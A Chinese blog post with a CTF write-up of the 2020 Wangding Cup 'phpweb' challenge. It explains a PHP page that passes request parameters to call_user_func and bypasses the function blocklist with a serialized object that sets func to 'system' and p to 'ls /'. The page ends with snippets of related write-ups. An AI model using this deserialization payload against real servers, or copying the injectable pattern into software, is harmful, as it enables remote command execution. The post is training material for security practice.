2021-10-17[网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2022-07-19 16:11:14 发布
最新推荐文章于 2022-07-19 16:11:14 发布
阅读量203 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50613938/article/details/120814318
版权

在我们页面其实并没有看见什么有用的信息,我只能通过大佬wp来看见,原来我们捉包后的func参数和p参数是能传递执行函数的,首先我们

在这里插入图片描述所以我们会想能不能执行file_get_contents函数来查看参数,查看index.php看到了参数

function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}

}//获取result获取的目标的字符类型,如果是string类型的就会输出

//将func获取的当成函数进行输出,函数的参数值是p,上面

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);

    }//这里可以进行变量覆盖,我们可以进行反序列化操作的地方
}

}

$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");

}//辨识传入的函数是不是危险函数,如果是危险函数就会直接结束。

}
?>

//所以上面的代码就是会把func传入的数值当做函数执行,但如果是危险函数就会结束进程,参数的值是p,我们可以通过反序列化来执行覆盖func和p来绕过过滤

```php
构造exp

	<?php
 class Test {
        *var $p = "ls /";*
        *var $func = "system";*
*}*
$a = new Test();
echo serialize($a);
//unserialize
?>​	
`

这个最后构造的代码块就是我们要执行的命令函数,第一个是要执行的函数,第二个是要执行的函数的参数,我们到了这里最后反序列化就好,使用unserialice执行反序列化,p哪里是序列化语句。

落夜雨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021-07-28 CTF Webbuuoj [网鼎杯 2020 半决赛]faka
LiNa_lInA_741的博客
07-28 917
CTF Web buu oj[网鼎杯 2020 半决赛]faka解题 [网鼎杯 2020 半决赛]faka 解题 不会写网站,做不了代码审计,就记录别人WP的解题思路,再回头来看 下载网站源代码,html/applilcation/admin,网站打开admin,跳到管理后台登录页面。 目录文件中有tk.sql文件,phpmyadmin先创建数据库,再导入tk.sql。 数据库打开表system_user,找到admin/md5后得密码 md5解密得到admin密码admincccbbb123 登
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第一个答案 en5oy 继续下一个 解方程,就直接硬着头皮的解答把 答案为: x=74 y=68 z=31 输入答案之后下一题 又是方程。。。。解一个 二元一次方程 x*x+x-7943722218936282=0 自己写了一个python脚本来解,脚本如下: import math print(“ax*x+bx+c=0”) a
2021-8-7[网鼎杯 2020 青龙]AreUSerialz的wp(经典反序列化例题)
qq_45290991的博客
08-07 498
[网鼎杯 2020 青龙]AreUSerialz 目录 题目:在buu平台上,题目传送门 解题过程: 两个防护: is_valid() destruct()魔术方法 本地进行序列化操作 题目:在buu平台上 解题过程: 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { ...
2021-09-21-网鼎杯AreUSerialz
unexpectedthing的博客
09-22 387
文章目录前言--php反序列化代码显示 前言–php反序列化 地址:buuctf 代码显示 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filena
网鼎杯-青龙-Web-Wp
XunanSec的博客
05-26 1171
0x01 开局一张图 一看就知道让我们代码审计 对于这种一长串的源码,还是逐步来解把 首先的解题思路就是查看CTF题目的命名和代码函数 CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字 在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。 我们整体的浏览一边代码,来看一下程序的大概走向。 <?php include("flag.php"); highlight_file(__FILE__); cl
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
(2021-2022年)专题资料完美版红鹤沟通朱雀门整合提案.ppt
10-03
教育精品资料
2020网鼎杯青龙部分题目WP
李熠专用博客_白帽子一枚,人称低危终结者
05-12 5986
0x01 Crypto之boom 下载下来是个exe文件,拖到cmd运行(切记一定不要双击,用cmd打开) 找个md5网站解密,得到明文 输入后得到一个方程,解方程(找个就不用说了,初中知识) 输入有又出现一个方程: 解出来输入x可得flag: 0x01 Reverse之signal 用IDA逆向后,可得关键算法: 他是将一串数字做了不同操作符运算,得到一个ascii码,即为flag,于是写出爆破payload如下: # -*- coding: UTF-8 -*- code = [10,
[re]符号执行一把梭:2020网鼎杯青龙re_signal_wp
热门推荐
Breeze的博客
05-15 1万+
[re]符号执行一把梭:2020网鼎杯青龙re_signal_wp 这道题是2020网鼎杯青龙的一道逆向提signal,一道虚拟机逆向题目,题目本身不难,可以直接分析也可以符号执行秒掉。 题目分析 正常windows逆向,开局直接输flag,也不多bibi: 逆向分析程序: 程序开始将全局变量区的opcode作为参数给vm_operad函数,看名字也能看出是一个虚拟机分析的题目,先把opcode提取出来: \x0A \x04 \x10 \x08 \x03 \x05 \x01 \x04 \x20 \x
网鼎杯misc部分题的wp
weixin_44906357的博客
06-09 1063
网鼎杯misc部分题的题解 自己的ctf算是零基础,进来公司安排的任务是收集整理近期ctf题目,我想着那就正好当作联系吧,于是随便自己写一下wp加深一下印象 1.hidden 上来先整一道简单的吧。 下面上wp 01 对压缩包进行解压,首先看到的是一张图片。然后开始常规的图片隐写题的套路。试了一波发现没找到flag。然后使用binwalk -e对图片进行分离,看到里面有一个压缩包 02 压缩包有密码,又看了一圈没发现什么提示,也有可能是没找到吧,然后尝试弱密码破解,最后试出来密码是1235 03 解压出来后
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1257
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2020——网鼎杯 (青龙)signal
寻梦&之璐
03-30 9785
文章目录vm_operad函数功能read函数功能简介流程验证数据(逆向重点)逆向思维 vm_operad int __cdecl vm_operad(int *a1, int a2) { int result; // eax@2 char v3[100]; // [sp+13h] [bp-E5h]@4 char v4[100]; // [sp+77h] [bp-81h]@5 char v5; // [sp+DBh] [bp-1Dh]@5 int v6; // [sp+DCh] [bp-
call_user_func()详解
Baymax001的博客
06-07 8622
先来看解释 : (PHP 4, PHP 5, PHP 7) call_user_func — 把第一个参数作为回调函数调用 通过函数的方式回调 <?php function barber($type){ echo "you wanted a $type haircut, no problem\n"; } call_user_func('barber','mushroom')
php刷题网站,刷题[网鼎杯 2020 朱雀]phpweb
weixin_42567279的博客
03-11 175
解题思路打开是一个蛮有意思的背景,众生皆懒狗,是自己没错了。源代码看一看,啥都没有。抓个包诶,一看到func和p两个参数,想到了call_user_func().尝试着把date改成system看有没用,显示hacker,证明有waf了随便输入个参数,让他报错。看看有没有爆出什么函数。果然是回调函数,那么大概思路感觉就是代码执行了,试了些函数,发现都被过滤了,这里思考可不可以读源码func=rea...
[网鼎杯 2020 朱雀]Nmap 1两种解法
weixin_53150482的博客
07-19 405
[网鼎杯 2020 朱雀]Nmap 1两种解法
2020网鼎杯 jocker wp(buu复现)
苗_的博客
08-07 404
f5之后发现,程序堆栈不平衡,不能直接反编译 options——general: 在0x401833这里改栈指针偏移,改成0,改成功之后就可以f5反编译了 可以看到主函数的逻辑还是比较简单的: 关键函数:wrong() omg() encrypt() 首先点进去wrong()函数,就是做一个加密,i 是偶数的时候进行异或操作,i 是奇数的时候进行减法操作 其次omg()函数,与所给字符串进行比较,这里直接上个小脚本: s=[102, 107, 99, 100, 127, 97,..
[网鼎杯 2020 朱雀]phpweb
最新发布
03-16
phpweb是一种基于PHP语言开发的Web应用程序框架,它提供了一系列的工具和函数库,使得开发者可以更加高效地构建Web应用程序。phpweb具有易于学习、易于使用、易于扩展等特点,因此在Web应用程序开发中得到了广泛的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值